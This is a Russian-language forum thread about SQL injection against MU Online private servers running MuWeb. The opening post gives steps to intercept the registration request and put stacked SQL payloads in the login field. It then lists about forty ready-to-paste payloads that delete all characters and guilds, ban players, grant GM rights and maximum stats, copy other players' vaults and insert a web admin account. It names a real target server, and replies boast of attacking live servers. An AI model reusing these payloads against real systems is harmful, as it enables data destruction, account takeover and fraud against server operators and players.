Новый способ SQL Injection - Разбираемся и защищаемся

[Dvoice]

Нашел еще один  способ SQL injection но у меня что неполучаеться может вы розберетеся. Поставлю Хайд навсякий

0. Скачать плагин мозилла
_https://addons.mozilla.org/es-ES/firefox/addon/966

1 - Переход на веб-сайте Му

2 - Перейдите в раздел регистрация.

3 - Заполните все поля в записи.

4 - Перейдите в меню Инструменты>> Перехват Данных>>> Запуск перехвата

5 -  Нажмите на сайте Регистраци

-Перехват данных

6 -  Изменить , строку Login на какуто из кодов инъекции

7-  Готов, и затем отправить запрос Прервать

Кода инъекции

Код Выделить Развернуть

Colocarte 200 Resets a tu Personaje
'x'; update character set resets = 200 where name = 'NOMBREDETUPJ'

Eliminar todos los Personajes del Server
'x' ; delete character

Cambiar de Raza tu Personaje
'x'; update character set class = 64 where name = 'NOMBREDETUPJ'


0 [DW ], 1 [SM ], 2 [GrandMaster] 16 [dk] 17 [bk] y 18 [bm] 64 [dl] 65 [le]


Desconectar todos los Personajes del Server
'x'; UPDATE MEMB_STAT SET ConnectStat='0' WHERE ConnectStat='1'

Full Stats tu Personaje
'x'; update character set strength=32767,dexterity=32767,energy=32767,vitali ty=32767,leadership=32767 where name = 'Kenya'

Colocar tu Personaje Level 400
'x'; update character set clevel=400 where name = 'NOMBREDETUPJ'


Copiar Vault de Otro Personaje
'x' ; UPDATE warehouse SET Items = (select items from warehouse where accountid = (select accountid from character where name = 'nombrepjacopiarbaul')) WHERE AccountID = 'nombredetucuenta'

Dejar Personaje Normal
'x'; update character set ctlcode = 0 where name = 'NOMBREDETUPJ'

Banear Personaje
'x'; update character set ctlcode = 1 where name = 'NOMBREDETUPJ'

Hacer GM tu Personaje
'x'; update character set ctlcode = 8 where name = 'NOMBREDETUPJ'

Colocarte LevelUP Points
'x'; update character set leveluppoints = 432 where name = 'NOMBREDETUPJ'


Codigo Items En tu Inventario
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB27F0570000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB67F0580000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB77F0590000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB37F05A0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB47F05B0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x0EEFFF00002FB57F0500000000000000 WHERE AccountID = 'mastercito'

----------------------------------------- ANUBIS -------------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC2000570000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC4000580000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002CC30F0590000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC50005A0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FF50F05B0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x15EFFF0000FFC60005D0000000000000 WHERE AccountID = 'mastercito'
----------------------------------------- BLESS --------------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x0DEFFF0000FFC60001E0000000000000 WHERE AccountID = 'mastercito'
----------------------------------------- Sun ----------------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B07F0078000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B17F0088000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B27F0098000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B37F00A8000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B47F00B8000000000000 WHERE AccountID = 'mastercito'
----------------------------------------- Ashcrow ------------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB37F0070000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB47F0080000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB57F0090000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB67F00A0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB77F00B0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB87F0000000000000000 WHERE AccountID = 'mastercito'
--------------------------------------------- RING -----------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x15EFFF0000C1C67F00D0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x1CEFFF0000DFB27F00D0000000000000 WHERE AccountID = 'Bakura'

Eliminar Guild
'x' ; Delete Guild

Cambiar Inventario
'x'; update character set inventory = 0x where name = 'NOMBREDETUPJ'

Cambiar Codigo de Administracion Web
'x'; INSERT INTO MuWeb_admin(username,password,securitycode)VALUES( 'MUAdmin','123123','0123')

ZEN Para tu PJ
'x'; update character set money=2000000000 where name = 'NOMBREDETUPJ'

Hacer Full stats a tu Personaje
'x'; update character set strength=65000,dexterity=65000,energy=65000,vitali ty=65000,leadership=65000 where name = 'NOMBREDETUPJ'

У меня неполучалося вот на этом сервере

_muequality.ru

Ои забыл про видео вот оно

[Everybody]

Люблю мозиллу изза модов которые часто годятся не только во благо ))
Цитата из описания мода

Use tamperdata to view and modify HTTP/HTTPS headers and post parameters.
Trace and time http response/requests.
Security test web applications by modifying POST parameters.

На первый взгляд: Вариант скл иньекции только по другому, изобретение велосипеда заного...
Тоже самое было ясно 10 января 2007.
https://x-mu.net/2007/01/10/tutorial__sql_injection.html

п.с. Наврятли будет работать в новых версиях мувеб, судя по дате размещения видео 18.11.2008, боян. Сейчас такие фишки фильтруются по самое неболуйся ))

[Lorencia]

Спойлер

У кого нибудь получилось?Если да , отпишитесь в ПМ или тут.

[свернуть]

[glom]

Уже 2 темы были! Автор BETWO.  Кстати на этом inj админы mu evilfighter  получают пиз..ы уже не раз от меня))

[MaRs]

Спойлер

glom, еще как получают За...лся по 3 разу ресет брать. Там теперь каждый день откаты

[свернуть]

[Ronny]

Бред ... Это в MuWeb
а MuWeb как всем известно такой дырявый что любой дуршлаг обзавидуеться !

[Eugenny]

я пробовал , и не получилось*(((
надо придумать кое что новое 0)

[vailoelle]

Some one may to explain more how to make SQl injection

[KURTIS]

эта инъекция работает на ура уже давно ей пользовался....
удалинея всех чаров работает практитески на любом нубском мувебе, как и все остальное, кредиты бы написал ато скопипастил с даркчитс и делов^_^

[MaF1oZo]

ну вот толькочто попробывал на MyMuWeb 0.5 и нефига невышло   печально...